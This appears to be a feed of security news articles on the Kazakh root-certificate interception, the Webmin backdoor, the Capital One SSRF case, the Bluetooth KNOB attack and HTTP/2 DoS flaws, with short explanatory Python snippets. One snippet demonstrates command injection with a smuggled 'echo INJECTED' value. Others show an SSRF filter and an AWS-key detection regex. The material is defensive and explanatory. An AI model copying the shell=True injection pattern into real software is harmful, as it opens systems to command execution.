Google and Mozilla have removed trust for a root certificate that the Kazakh government was forcing some citizens to install on their devices as a way to intercept and inspect HTTPS traffic to some sites.

The move essentially invalidates the certificate in Chrome and Firefox and means that anyone with the root CA installed in one of those browsers will see a warning message that says the certificate is not trusted.

“We believe this act undermines the security of our users and the web, and it directly contradicts Principle 4 of the Mozilla Manifesto that states, ‘Individuals’ security and privacy on the internet are fundamental and must not be treated as optional’,” Wayne Thayer of Mozilla said.

“To protect our users, Firefox, together with Chrome, will block the use of the Kazakhstan root CA certificate. This means that it will not be trusted by Firefox even if the user has installed it. We believe this is the appropriate response because users in Kazakhstan are not being given a meaningful choice over whether to install the certificate and because this attack undermines the integrity of a critical network security mechanism.”

Google and Mozilla made the decision about a month after the HTTPS interception effort began in Kazakhstan. The interception effort targeted a subset of Internet users in Kazakhstan and focused on a small number of sites, including Twitter, Facebook, and Google. By forcing people to install the root certificate, the Kazakh government was able to impersonate those sites and decrypt and inspect any traffic going to them from devices with the certificate installed. The technique is commonly used by repressive regimes as a way to keep tabs on citizens’ Internet usage and interests. But HTTPS interception is not just an invasion of privacy for users; it’s also dangerous.
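The interception works because TLS validation reduces to chaining a site’s certificate up to a locally trusted root; a forcibly installed root makes the impersonated certificates look valid. One way a curious user can still spot it is by looking at who actually issued the certificate a site presents. A minimal Python sketch (illustrative only, not from the article; real detection would examine the full chain, not just the leaf):

```python
import socket
import ssl

def flatten_name(name):
    """Flatten the RDN tuple-of-tuples returned by getpeercert() into a dict."""
    return {key: value for rdn in name for (key, value) in rdn}

def issuer_of(host, port=443):
    """Connect to a server over TLS and return its leaf certificate's issuer."""
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=5) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            return flatten_name(tls.getpeercert()["issuer"])

# e.g. issuer_of("google.com") normally names a well-known commercial CA;
# on a device with an interception root installed, it names that root instead.
```

The check only passes in the first place because `create_default_context()` consults the local trust store, which is exactly what the forced root installation subverts.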

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data."

“In my view, and the overwhelming view of my colleagues in the security engineering community, this is a dangerously misguided policy, and will have the effect of making every citizen impacted by this policy less safe. It is difficult enough for the largest technology companies in the world to secure their own central network and certificate infrastructure; the notion that a modestly funded small government with limited technical resources can pull it off is naive, to say the least,” Kenn White, a senior security engineer and director of the Open Crypto Audit Project, said at the time the interception effort began in July.

Google’s Chrome engineering team took the same action Mozilla did, removing trust for the Kazakhstan root CA.

“We will never tolerate any attempt, by any organization—government or otherwise—to compromise Chrome users’ data. We have implemented protections from this specific issue, and will always take action to secure our users around the world,” Parisa Tabriz, senior engineering director for Chrome, said in a statement.

Researchers at the Censored Planet project at the University of Michigan have been monitoring the interception effort in Kazakhstan since it began and their measurements show that the interception essentially ended on August 7. It would be a simple matter for the Kazakh government to obtain another root certificate and start the effort all over again, but it would also need to go through the process of forcing citizens to install it, too.

]]>
<![CDATA[Deciphering Blackhat]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/deciphering-blackhat https://duo.com/decipher/deciphering-blackhat Wed, 21 Aug 2019 00:00:00 -0400

There are a lot of things you could say about Blackhat. Not many of them are kind. But of all the hacker movies that have been made, it's definitely one. It has many of the elements of a good spy thriller, and there's probably a very solid espionage movie hiding in there somewhere. It also has some pretty realistic hacking scenes, shady CIA operatives, and Thor. It's a lot, but Zoe Lindsey, Peter Baker, and Dennis Fisher are here to break it all down for you.

]]>
<![CDATA[Nation-State Attacks Target Medical Research]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/nation-state-attacks-target-medical-research https://duo.com/decipher/nation-state-attacks-target-medical-research Wed, 21 Aug 2019 00:00:00 -0400

Nation-state attackers from Russia, Vietnam, and China are increasingly targeting hospitals, pharmaceutical companies, and research universities in search of healthcare data, intellectual property, and medical research, FireEye said.

While the bulk of attacks continue to be financially motivated and opportunistic, a growing number of intelligence operations are stealing medical research and medical data belonging to specific individuals, FireEye said in its Beyond Compliance: Cyber Threats and Healthcare report. Many of the attacks have a physical impact, such as ransomware that attempts to halt hospital operations, or disrupting medical devices to harm patients. Healthcare data continues to be valuable: between the last quarter of 2018 and the first quarter of 2019, FireEye analysts found multiple stolen healthcare databases being sold on online criminal marketplaces.

"Actors buying and selling PII and PHI from healthcare institutions and providers in underground marketplaces is very common, and will almost certainly remain so due to this data's utility in a wide variety of malicious activity ranging from identity theft and financial fraud to crafting of bespoke phishing lures," the report said.

A 4.3 GB file of healthcare records stolen from a U.S. entity, which included patient data, driver’s license information, and insurance details, was available for $2,000. This kind of file would be valuable for criminals interested in conducting insurance fraud or for those crafting targeted attacks.

Cure for Cancer

Espionage groups frequently focus on intellectual property and cutting-edge research, and Chinese espionage groups may be stealing medical research to boost the country’s own companies. China has one of the world's fastest-growing pharmaceutical industries.

“Targeting medical research and data from studies may enable Chinese corporations to bring new drugs to market faster than Western competitors,” FireEye said.

FireEye analysts found that groups linked to China also seem particularly interested in stealing cancer research. A Chinese espionage group targeted researchers at a U.S.-based cancer research center in April with malware-laden emails referencing a research conference the organization had hosted. APT41 sent spear-phishing emails to that same center a year earlier. APT22 is believed to have targeted a single institution over many years. APT10 launched spear-phishing campaigns in 2017 against Japanese entities, and some of the documents used in those campaigns referenced cancer research conferences.

The focus on cancer-related research may be tied to “China’s growing concern over increasing cancer and mortality rates, and the accompanying national health care costs,” FireEye said.

Intelligence operations also collect medical data to find information about specific people of interest. The U.S. Department of Justice unsealed an indictment of a Chinese national for the 2015 attack on health insurance company Anthem, in which information on nearly 79 million people was stolen.

“One theme FireEye has observed among Chinese cyber espionage actors targeting the healthcare sector is the theft of large sets of PII and PHI, most notably with several high-profile breaches of U.S. organizations in 2015,” FireEye said. “We assess that the theft of bulk data appears to remain a tactic employed by Chinese cyber espionage actors in targeting certain groups of individuals, as evidenced by the breach of SingHealth in 2018.”

China isn’t the only country interested in medical data. At least two Russian APT groups and a Vietnam-based group have also targeted healthcare organizations or stolen related data. APT28 (which CrowdStrike calls “Fancy Bear”) attacked the World Anti-Doping Agency (WADA), the global organization that handles testing Olympic athletes for use of banned drugs and supplements. Vietnam’s APT32 targeted a British healthcare organization, FireEye said in its report.

]]>
<![CDATA[Backdoor Found in Webmin Utility]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/backdoor-found-in-webmin-utility https://duo.com/decipher/backdoor-found-in-webmin-utility Tue, 20 Aug 2019 00:00:00 -0400

On August 17, the developer of the popular Webmin and Usermin Unix tools pushed out an update to fix a handful of security issues. Normally that wouldn’t generate an avalanche of interest, but in this case, one of those vulnerabilities was introduced intentionally by someone who was able to compromise the software build infrastructure used by the developers.

“Webmin version 1.890 was released with a backdoor that could allow anyone with knowledge of it to execute commands as root,” Jamie Cameron, the author of Webmin, wrote in an explanation of the incident.

Webmin is a systems-management user interface tool that’s widely used in Unix-based environments, and Usermin is a webmail client. On Saturday the developer released an emergency update for the tools to address several cross-site scripting vulnerabilities, as well as a serious remote-code execution flaw that the developers say was inserted into the codebase on purpose. The vulnerability only appears in the version of the code that was released on Sourceforge and not the version that was on GitHub. The backdoor was first introduced in version 1.890 and was also included in 1.900 and 1.920.

Cameron said that the Webmin build system was compromised sometime in April 2018 and the attacker was able to add the malicious code into the codebase. The attacker then rolled the timestamp on the build back to prevent anyone from noticing the new addition.

“It appears that a build/test system was compromised some time last year and the exploit added to code in the directory from which packages are built (and file timestamps modified to make this change not show up in a git diff),” Cameron said in an email.

“How the exploit happened is impossible to determine at this point, as the machine in question has been decommissioned. Unfortunately before this the directory was copied to a new build host, so a limited version of the exploit persisted into future versions.”

“How the exploit happened is impossible to determine at this point, as the machine in question has been decommissioned."

The vulnerability that the attacker added to the Webmin code is a subtle one that was present in default configurations in Webmin 1.890. If Webmin was configured to prompt users to change their passwords once they’ve expired, the vulnerability was present and could be exploited remotely. The modified code went unnoticed for several months.

“The vulnerable file was reverted to the checked-in version from Github, but sometime in July 2018 the file was modified again by the attacker. However, this time the exploit was added to code that is only executed if changing of expired passwords is enabled,” Cameron said in his explanation.

“On September 10th 2018, the vulnerable build server was decommissioned and replaced with a newly installed server running CentOS 7. However, the build directory containing the modified file was copied across from backups made on the original server.”

The updated versions are Webmin 1.930 and Usermin 1.780. Details of the Webmin vulnerability became public during the DEF CON conference earlier this month, and exploit code is easily available, adding to the urgency of installing the patched version. Cameron and the Webmin development team were only notified of the vulnerability on August 17 and then set about finding and removing the vulnerable code.

The change “wasn't made by me or any other developer, and was hidden via use of a tricky Perl operation that didn't make it clear that this could be used as an exploit,” he said in his email to Decipher.
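The “tricky Perl operation” itself isn’t reproduced here, but the general class of flaw it belongs to—untrusted form input reaching a shell-execution primitive—can be sketched in a few lines. This is a hypothetical Python analog for illustration, not the actual Webmin code:

```python
import subprocess

def log_attempt_vulnerable(user_input):
    # BAD: shell=True with string interpolation; input like
    # "hello; echo INJECTED" runs the injected command as well
    return subprocess.run("echo %s" % user_input, shell=True,
                          capture_output=True, text=True).stdout

def log_attempt_safe(user_input):
    # Safe: argv form, so the input stays a single literal argument
    return subprocess.run(["echo", user_input],
                          capture_output=True, text=True).stdout

print(log_attempt_vulnerable("hello; echo INJECTED").splitlines())  # ['hello', 'INJECTED']
print(log_attempt_safe("hello; echo INJECTED").splitlines())        # ['hello; echo INJECTED']
```

In Webmin’s case the equivalent pattern ran as root, which is what made the backdoor a full remote-code-execution hole.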

]]>
<![CDATA[Hacking for Good: The Cult of the Dead Cow and the Rise of Hacker Culture]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/hacking-for-good-the-cult-of-the-dead-cow-and-the-rise-of-hacker-culture https://duo.com/decipher/hacking-for-good-the-cult-of-the-dead-cow-and-the-rise-of-hacker-culture Tue, 20 Aug 2019 00:00:00 -0400

The hacker culture that exists today can trace its origins to the hacker scenes of the 1980s and 1990s, when IRC was the place to be and tools and knowledge were currency. In those early years a variety of hacker crews formed around the world, including the Cult of the Dead Cow, which grew from a handful of friends in Texas into an enduring influence on the security industry and the culture at large.

During Black Hat USA 2019, cDc members Adam O'Donnell and Luke Benfey joined fellow hackers Dug Song, Katie Moussouris, and Heather Adkins for a discussion of the group's origins, the hacker mentality, and how hacker culture has become mainstream. Author and journalist Joseph Menn moderated the discussion.

]]>
<![CDATA[AWS Promises to Scan for Misconfigured Servers]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/aws-promises-to-scan-for-misconfigured-servers https://duo.com/decipher/aws-promises-to-scan-for-misconfigured-servers Mon, 19 Aug 2019 00:00:00 -0400

Like many recent data breaches, Capital One’s data breach was not the result of a vulnerability in Amazon’s cloud infrastructure, but rather of how the financial giant had configured its systems. Even though Amazon Web Services wasn’t to blame, the company said that going forward, it will warn customers if it detects problems with how they have configured their systems and applications.

In response to a letter from Sen. Ron Wyden (D-Ore.) asking for clarification on how the attack unfolded, Amazon Web Services reiterated that the attack succeeded because the attacker gained access through a misconfigured web application firewall and obtained broader permissions than intended. Specifically, Wyden wanted to know whether a “server-side request forgery (SSRF) vulnerability” was exploited to trick misconfigured servers into revealing information.

“As Capital One outlined in their public announcement, the attack occurred due to a misconfiguration error at the application layer of a firewall installed by Capital One, exacerbated by permissions set by Capital One that were likely broader than intended,” wrote AWS CISO Stephen Schmidt. In the letter to Wyden, he wrote, “As discussed above, SSRF was not the primary factor in the attack.”

SSRF was one of several ways the attacker could have potentially gotten access to data once the attacker had gotten past the firewall and into the environment, Schmidt told Wyden.
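SSRF is dangerous in cloud environments largely because of the instance metadata service, which lives at the link-local address 169.254.169.254 and can hand out temporary credentials. A minimal sketch of the kind of target check a fetch-a-URL feature should perform (illustrative only; real code must also resolve hostnames and re-check after redirects):

```python
import ipaddress
from urllib.parse import urlparse

def is_allowed_target(url):
    """Reject URL targets that point at private, loopback, or link-local
    addresses, such as the cloud metadata service at 169.254.169.254."""
    host = urlparse(url).hostname
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        # Not an IP literal: real code must resolve the name and re-check
        return True
    return not (addr.is_private or addr.is_link_local or addr.is_loopback)

print(is_allowed_target("http://169.254.169.254/latest/meta-data/"))  # False
print(is_allowed_target("http://8.8.8.8/"))                           # True
```

Defenses like this complement, rather than replace, the least-privilege permissions Schmidt describes: even a successful SSRF yields little if the stolen credentials can access almost nothing.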

As for how AWS makes sure customers are protecting their data, AWS provides “clear guidance on both the importance and necessity of protecting” systems from different attacks, including SSRF, Schmidt said. Customers have “documentation, how-to-guides, and professional services” to set up the web application firewall correctly. There is also “guidance and tools” to help customers set up the right level of permissions for different resources.

If the organization took a defense-in-depth approach and had multiple layers of protection “with intentional redundancies,” an attacker would not be able to get far enough to steal the data even after getting past the WAF, the letter said.

“Even if a customer misconfigures a resource, if the customer properly implements a ‘least privilege’ policy, there is relatively little an actor has access to once they are authenticated,” Schmidt said.

Misconfiguration is a Big Issue

One of the biggest misconceptions about moving application workloads to the cloud is that the service provider takes care of everything related to security. The reality is that both the cloud service provider and the organization have roles to play to keep systems and data secure. When it comes to cloud infrastructure such as Amazon Web Services, Microsoft Azure, and Google Cloud, the service providers are responsible for the physical data centers and the server hardware the virtual machines run on. This is why the providers took the first pass at protecting their infrastructure from the Meltdown and Spectre flaws, for example.

The organization, on the other hand, is responsible for protecting the virtual machines and the applications—by deploying the necessary controls, virtual appliances, and other security defenses. It is up to the organization to deploy a WAF, to encrypt the data, and restrict user-level permissions.

Some cloud providers make it easier to have those controls than others. While AWS has a comprehensive set of security tools, many of them are not available by default. Schmidt listed several AWS security services, including Macie, which automatically classifies data in storage buckets and then warns of anomalous attempts to access those buckets; and GuardDuty, which alerts when there are unusual Application Programming Interface (API) calls. The “Well Architected Review” service inspects the customer’s technology architecture and gives feedback on whether the customer is following best practices.

Most of these services—and many others—require administrators to consult the aforementioned documentation and guidance to deploy them into their AWS environment. Some public cloud providers enable security controls by default for customers.

Providers Stepping In

Many recent cloud-based data breaches are the result of mistakes made by the organization, such as not restricting who can access Amazon Simple Storage Service (S3) buckets, or accidentally committing application tokens and credentials into public GitHub code repositories. In each of these instances, the providers aren’t at fault, but there have been so many of them in recent months that many service providers are beginning to act preemptively to detect those mistakes before they become incidents.

Schmidt told Wyden that AWS has started scanning public IP addresses to identify potentially problematic configurations. While it won’t be clear to AWS if the customer’s server is actually configured incorrectly, if something doesn’t look right, AWS will “err on the side of over-communicating” and warn the customer. AWS will “push harder” for customers to use Macie and GuardDuty, as well as “redouble our efforts” to help customers set restricted permissions, Schmidt said.

What AWS is doing is similar to how GitHub and GitLab scan public code repositories to see if any secrets—application tokens, credentials, SSH private keys, or other sensitive information—were committed alongside the code. The repository providers notify the services that issued those secrets so they can be revoked, and warn the customer who committed them. For example, if someone accidentally committed an API key for AWS into the code, the scanning service would notify Amazon so that the key could be revoked before it could be abused.
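The scanning itself is largely pattern matching. A simplified sketch of the idea (the real services use many more patterns and verify candidates with the issuing provider before alerting anyone); the key shown is Amazon's documented example value, not a real credential:

```python
import re

# AWS access key IDs have a recognizable shape: "AKIA" followed by
# 16 uppercase alphanumeric characters. One pattern of many.
AWS_KEY_ID = re.compile(r"\bAKIA[0-9A-Z]{16}\b")

def find_candidate_secrets(text):
    """Return strings in a commit that look like AWS access key IDs."""
    return AWS_KEY_ID.findall(text)

commit = 'aws_access_key_id = "AKIAIOSFODNN7EXAMPLE"'
print(find_candidate_secrets(commit))  # ['AKIAIOSFODNN7EXAMPLE']
```

Pattern matching alone produces false positives, which is why the providers confirm a candidate is live before notifying the issuer.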

The cloud is secure, but if an organization doesn't know how to securely configure its networks, applications, and data, there is a problem. Organizations will benefit from better security in the cloud, but that presupposes they are taking care of their responsibilities. Providers are now offering some of that hand-holding to make sure the basics are taken care of.

]]>
<![CDATA[Coordinated Ransomware Attack Hits Texas Government Agencies]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/coordinated-ransomware-attack-hits-texas-government-agencies https://duo.com/decipher/coordinated-ransomware-attack-hits-texas-government-agencies Mon, 19 Aug 2019 00:00:00 -0400

More than 20 government agencies in Texas have been victimized in what looks to be a coordinated ransomware attack.

The attack took place over the weekend, and officials with the Texas Department of Information Resources said that most of the targeted agencies are smaller local government bureaus, though they have not identified which specific agencies have been hit. The officials also have not publicly disclosed which ransomware is involved in the incident or what the ransom demands are.

“On the morning of August 16, 2019, more than 20 entities in Texas reported a ransomware attack. The majority of these entities were smaller local governments. Later that morning, the State Operations Center (SOC) was activated with a day and night shift. At this time, the evidence gathered indicates the attacks came from one single threat actor. Investigations into the origin of this attack are ongoing; however, response and recovery are the priority at this time,” the DIR said in a statement.

Ransomware began as mostly a consumer threat, with attackers infecting individual victims, encrypting their data and demanding a ransom in order to decrypt it. In the last couple of years, however, attackers have been targeting enterprises and government agencies in an effort to maximize the potential payout for their intrusions. There have been a number of large-scale ransomware attacks on city and state governments recently, most notably the crippling intrusion of the City of Baltimore’s infrastructure in May. The attackers demanded a $100,000 ransom, which city officials refused to pay, and instead began restoring systems from backups. That process is still ongoing and the city has estimated the attack has cost more than $18 million so far.

Other cities that have been targeted by ransomware have chosen a different path. Two cities in Florida, Lake City and Riviera Beach, both opted to pay large ransoms in order to recover their data. Lake City paid about $500,000 and Riviera Beach paid nearly $600,000.

Baltimore’s network was hit by the RobbinHood ransomware, but there are dozens of individual ransomware variants, most of which can be quite difficult to deal with. Security researchers have been successful in finding weaknesses or decryption methods for some ransomware, but there are many others that have no technical solution available. Law enforcement agencies typically advise victim organizations not to pay the ransom if they’re hit, but organizations without current backups sometimes don’t have other options.

The Texas DIR officials said 23 total agencies were compromised in the current attack, although it does not appear that the State of Texas network itself was hit with the ransomware.

]]>
<![CDATA[New Attack Exposes Serious Bluetooth Weakness]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/new-attack-exposes-serious-bluetooth-weakness https://duo.com/decipher/new-attack-exposes-serious-bluetooth-weakness Fri, 16 Aug 2019 00:00:00 -0400

The Bluetooth protocol has a fundamental weakness that can allow an attacker to intercept and decrypt supposedly secure communications, and the vulnerability affects virtually every device that has Bluetooth capabilities.

The vulnerability is in the method that Bluetooth devices use to negotiate the initial encryption key to secure communications between them. The Bluetooth specification states that the key must be between 8 and 128 bits in length, and the process through which the two devices negotiate the key length is done in the clear with no authentication. A group of researchers developed a new attack called KNOB (Key Negotiation of Bluetooth) that can force two devices to use an 8-bit key, which can be brute-forced quite easily, allowing the adversary to listen in on any encrypted sessions between the devices without being detected. The weakness affects the Bluetooth firmware and the researchers tested their attack on a wide variety of chips from Broadcom, Intel, Apple, and Qualcomm, among others, all of which were vulnerable.
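To see why an 8-bit key offers no protection, consider a toy stream cipher. The keystream here is SHA-256-derived, a stand-in for Bluetooth’s actual E0 cipher, but the brute-force logic is the same for any cipher once the key space shrinks to 256 values:

```python
import hashlib

def keystream(key_byte, n):
    """Toy keystream derived from a single key byte (stand-in for E0)."""
    return hashlib.sha256(bytes([key_byte])).digest()[:n]

def xor_crypt(key_byte, data):
    """XOR stream cipher: encryption and decryption are the same operation."""
    return bytes(a ^ b for a, b in zip(data, keystream(key_byte, len(data))))

def brute_force(ciphertext, crib):
    """Try all 256 possible keys; return the one whose recovered
    plaintext starts with a known fragment (the crib)."""
    for k in range(256):
        if xor_crypt(k, ciphertext).startswith(crib):
            return k
    return None

ct = xor_crypt(0x5A, b"AT+CIND?")   # eavesdropped traffic
print(hex(brute_force(ct, b"AT+CIND")))  # 0x5a, after at most 256 tries
```

With the full 128-bit key space the same loop would need on the order of 2^128 tries; at 8 bits it finishes instantly, which is the entire point of the KNOB downgrade.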

An attacker would simply need to be within Bluetooth range of the target devices to launch the KNOB attack.

“The KNOB attack can be conducted remotely or by maliciously modifying few bytes in one of the victim’s Bluetooth firmware. Being a standard-compliant attack it is expected to be effective on any firmware implementing the Bluetooth specification, regardless of the Bluetooth version. The attacker is not required to possess any (pre-shared) secret material and he does not have to observe the pairing process of the victims,” the paper says.

“The attack is effective even when the victims use the strongest security mode of Bluetooth (Secure Connections). The attack is stealthy because the application using Bluetooth and even the operating systems of the victims cannot access or control the encryption key negotiation protocol.”

The research team that developed the attack includes Daniele Antonioli of Singapore University of Technology and Design, Nils Ole Tippenhauer of CISPA Helmholtz Center for Information Security, and Kasper Rasmussen of the University of Oxford. The team presented the findings at the USENIX Security Symposium this week, and worked with the CERT/CC at Carnegie Mellon University to coordinate the disclosure with affected vendors.

For individual users, the attack as described by the researchers would be invisible and the best defense at this point is to turn off Bluetooth on affected devices. But that removes quite a bit of the functionality of many devices, especially phones. The Bluetooth Special Interest Group, which maintains the specification, has changed the specification to require a longer minimum key length.

“To remedy the vulnerability, the Bluetooth SIG has updated the Bluetooth Core Specification to recommend a minimum encryption key length of 7 octets for BR/EDR connections. The Bluetooth SIG will also include testing for this new recommendation within our Bluetooth Qualification Program. In addition, the Bluetooth SIG strongly recommends that product developers update existing solutions to enforce a minimum encryption key length of 7 octets for BR/EDR connections,” the statement says.

The KNOB attack is quite similar to a vulnerability that Google fixed in the Titan hardware security keys in May.

]]>
<![CDATA[Chrome and Firefox Removing EV Certificate Indicators]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/chrome-and-firefox-removing-ev-certificate-indicators https://duo.com/decipher/chrome-and-firefox-removing-ev-certificate-indicators Thu, 15 Aug 2019 00:00:00 -0400

Browser makers have been making a series of changes to the way they display security indicators to users, and in the next major versions of Chrome and Firefox, Google and Mozilla will remove the information about extended validation (EV) SSL certificates from the address bar, having decided that it doesn’t communicate any useful information to users.

For many years, browser vendors have struggled to find effective ways to communicate the relative security of a given site to users. Locks, open or closed or missing, stoplight colors, and various combinations thereof have all been tried, with varying degrees of success. In some cases, the indicators were too small or too vague, and in others they didn’t communicate the information they were meant to communicate. Google, Microsoft, Mozilla, and Apple all have tinkered with the icons in the browser address bar recently, specifically with the icon that indicates the status of a site’s certificate and therefore the visitor’s connection to it. Google is planning a major change to that in Chrome 77, removing the EV status information from the address bar altogether and moving it into a drop-down instead.

The reasoning behind the decision is that people apparently don’t pay much attention to the indicator and don’t miss it when it’s gone. Google’s internal research, as well as previous academic research, shows that when the EV certificate information is removed from the address bar, people will still enter sensitive information into a site, even with no indication that it’s secure. Extended validation certificates require a higher level of proof of identity for organizations, including verification of the organization’s legal identity and physical existence as well as exclusive control over the domain. But that information is not obvious to people visiting a site with an EV certificate.

“Through our own research as well as a survey of prior academic work, the Chrome Security UX team has determined that the EV UI does not protect users as intended (see Further Reading below). Users do not appear to make secure choices (such as not entering password or credit card information) when the UI is altered or removed, as would be necessary for EV UI to provide meaningful protection,” Google said.

“Further, the EV badge takes up valuable screen real estate, can present actively confusing company names in prominent UI, and interferes with Chrome's product direction towards neutral, rather than positive, display for secure connections. Because of these problems and its limited utility, we believe it belongs better in Page Info.”

Mozilla’s reasoning for making the change is similar. The company said users basically don’t notice the EV indicator and so it has no effective use in the address bar.

“In desktop Firefox 70, we intend to remove Extended Validation (EV) indicators from the identity block (the left hand side of the URL bar which is used to display security / privacy information). We will add additional EV information to the identity panel instead, effectively reducing the exposure of EV information to users while keeping it easily accessible,” Johann Hofmann of Mozilla said.

“The effectiveness of EV has been called into question numerous times over the last few years, there are serious doubts whether users notice the absence of positive security indicators and proof of concepts have been pitting EV against domains for phishing.”

Firefox 70 is scheduled for release in October and Chrome 77 will be available in early September.

]]>
<![CDATA[Proposal to Make HTTPS Certificate Expire Yearly Back on the Table]]> fahmida@decipher.sc (Fahmida Y. Rashid) https://duo.com/decipher/proposal-to-make-https-certificate-expire-yearly-back-on-the-table https://duo.com/decipher/proposal-to-make-https-certificate-expire-yearly-back-on-the-table Thu, 15 Aug 2019 00:00:00 -0400

An industry group of web browser makers and certificate authorities is considering a proposal to limit the lifespan of digital certificates to just a little more than a year.

Google engineer Ryan Sleevi submitted the proposal to the CA/Browser Forum, an industry group of certificate authorities, major browser makers, and software developers. The CAB Forum sets standards and policies for how security certificates are issued and used on the web, and how long a TLS (Transport Layer Security) certificate should be valid is a recurring topic. Sleevi’s proposal would shorten the maximum validity period to 13 months from the current 27 months. There’s nothing to stop CAs from issuing certificates with shorter validity periods—the proposal only caps how long a certificate can last before it must expire.

TLS certificates are used to encrypt connections to websites and to ensure that someone else cannot tamper with user sessions or eavesdrop on communications sent to and from the site. The browser can tell a certificate is valid and can be trusted up until the expiration date—after that date, the browser will warn users away from the site because it can no longer verify that the site can be trusted. It is the website owner’s responsibility to renew the certificates to ensure that users can keep reaching the site.

The maximum validity period used to be eight years, before it was shortened to five years, and then three. The forum voted to set the limit at 27 months in 2017 as a compromise, after certificate authorities balked at a different proposal to slash the validity period from 39 months to 13 months. Sleevi tried to get a vote on 13 months earlier this year but did not gain traction then.

If the proposal gets enough votes, the measure will take effect in March 2020.

In an ideal scenario, websites will always have certificates using the latest cryptography, and one way to ensure that is by making websites renew their certificates frequently. Short validity periods ensure that older, insecure algorithms aren’t hanging around the ecosystem for a long time. A stolen certificate is also less of a problem, since it would expire shortly. The downside of shorter validity periods is that websites have to renew certificates more frequently.
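
In practice, the renewal burden is usually handled by a scheduled check of each certificate's remaining lifetime. A minimal sketch of that logic follows; the 30-day threshold is an illustrative assumption, not a value mandated by any CA or standard.

```python
from datetime import datetime, timedelta

# Illustrative renewal-window check, the kind of logic automated
# tooling (such as ACME clients used with Let's Encrypt) runs on a
# schedule. The 30-day window here is an assumption for the example.
RENEWAL_WINDOW = timedelta(days=30)

def needs_renewal(not_after: datetime, now: datetime) -> bool:
    # Renew once less than RENEWAL_WINDOW of validity remains,
    # leaving time to fix failures before the certificate expires.
    return not_after - now < RENEWAL_WINDOW

now = datetime(2020, 3, 1)
assert needs_renewal(datetime(2020, 3, 15), now)      # 14 days left: renew
assert not needs_renewal(datetime(2021, 4, 2), now)   # ~13 months left: fine
```

Run unattended, a check like this makes a 13-month or even 90-day lifetime a non-event; run manually across thousands of certificates, it becomes the coordination burden the CAs describe.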

From a security standpoint, this proposal makes a lot of sense, and is one of the reasons browser makers Google and Mozilla support shortening the lifespan of these certificates. If there is a policy change or cryptographic standards change, the browser makers don’t want to have to wait more than a year for all the existing certificates to expire. For example, if this change goes into effect March 1, 2020, browsers still have to trust certificates that were issued in February and January for the full two-year period. If the decision is made to switch to a stronger cryptographic algorithm than SHA-2 (SHA-256) in certificates (which will happen some day), browsers will have to wait more than two years under the current scheme for all the already issued certificates to expire. That is a long time for certificates using deprecated methods to be still trusted.

The “validity period of certificates represents the single greatest impediment towards improving the security of the Web PKI,” Sleevi has said in the past.

DigiCert’s Timothy Hollebeek opposes the proposal, arguing that the security benefits aren’t enough to offset the increased headaches for website owners who have to renew more often. "Rapidly reducing certificate lifetimes to one year, or even less, has significant costs to many companies which rely on digital certificates to protect their systems."

That argument makes sense on the surface, except that the free certificate authority Let's Encrypt issues 90-day certificates. Let's Encrypt currently has more than 100 million active certificates, and that number grows every day. If website owners can keep up with Let's Encrypt's short lifespans, then they can keep up with 13-month certificates from other CAs. Keeping up with frequent renewals is difficult if the organization is handling the process manually. Let's Encrypt customers don't have a problem with shorter validity periods because the CA provides an automated process that handles renewals. Most CAs don't, and most organizations have not automated their certificate management processes, either.

It sounds trite to keep insisting that security needs to be automated, but this is one of the situations where it really does. Organizations that have tens of thousands of certificates deployed across their network and websites (and more they may have missed or don't know about) spend weeks coordinating with different teams to get certificates renewed and redeployed. CAs aren't wrong in arguing that many organizations aren't currently equipped to handle a rapid cycle of renewals.

“Certificate management continues to be a manual process for most businesses – a shortened lifespan means IT teams will have to invest 3X to manage rolling certificates, which produces a 3X outage and configuration misstep risk," said Keyfactor’s chief security officer Chris Hickman. "Our research shows that 71 percent of businesses don't even know how many certificates they have – leaving them ill-equipped to revoke and reissue at scale.”

But the answer shouldn't be keeping the validity period the same. Instead, the industry—browser makers, CAs, and developers—should be figuring out a way to make the process easier for website owners. Let's Encrypt is getting a lot of traction because it has software that handles renewals—tools that take away the manual effort will go a long way towards fixing this problem.

A shorter maximum lifetime makes it possible for browsers and organizations to adapt faster to changes in security. For individual end users, this policy doesn’t really matter. For website owners, it can be challenging, especially if they aren’t using Let’s Encrypt’s automated system. But from the perspective of the ecosystem, it affects how quickly algorithms can be changed, or mistakes rectified.

]]>
<![CDATA[Many HTTP/2 Servers Vulnerable to DoS Bugs]]> dennis@decipher.sc (Dennis Fisher) https://duo.com/decipher/many-http-2-servers-vulnerable-to-dos-bugs https://duo.com/decipher/many-http-2-servers-vulnerable-to-dos-bugs Wed, 14 Aug 2019 00:00:00 -0400

The HTTP/2 server implementations from a long list of vendors, including Amazon, Apple, Microsoft, and Apache, are susceptible to several newly disclosed attacks that can exhaust the resources of a target server with minimal effort from an attacker.

The eight new vulnerabilities are similar in their effects, although they differ slightly in the details. Researchers from Netflix and Google discovered the vulnerabilities and worked with the CERT/CC at Carnegie Mellon University to notify vendors and help produce patches, some of which were published yesterday when the disclosures about the vulnerabilities were made public. All of the vulnerabilities are variations on denial-of-service conditions and none of them allow an attacker to execute arbitrary code or take any other malicious actions on vulnerable servers.

“These attack vectors allow a remote attacker to consume excessive system resources. Some are efficient enough that a single end-system could potentially cause havoc on multiple servers. Other attacks are less efficient; however, even less efficient attacks can open the door for DDoS attacks which are difficult to detect and block,” the vulnerability advisory from Netflix says.

“Many of the attack vectors we found (and which were fixed today) are variants on a theme: a malicious client asks the server to do something which generates a response, but the client refuses to read the response. This exercises the server’s queue management code. Depending on how the server handles its queues, the client can force it to consume excess memory and CPU while processing its requests.”

HTTP/2 is an update to the foundational HTTP protocol and is designed to provide faster and more efficient browsing. The protocol is supported by about 40 percent of the top 10 million sites, including Google, Twitter, Amazon, and YouTube. Those sites also support HTTP/1.1, the previous version of the protocol.

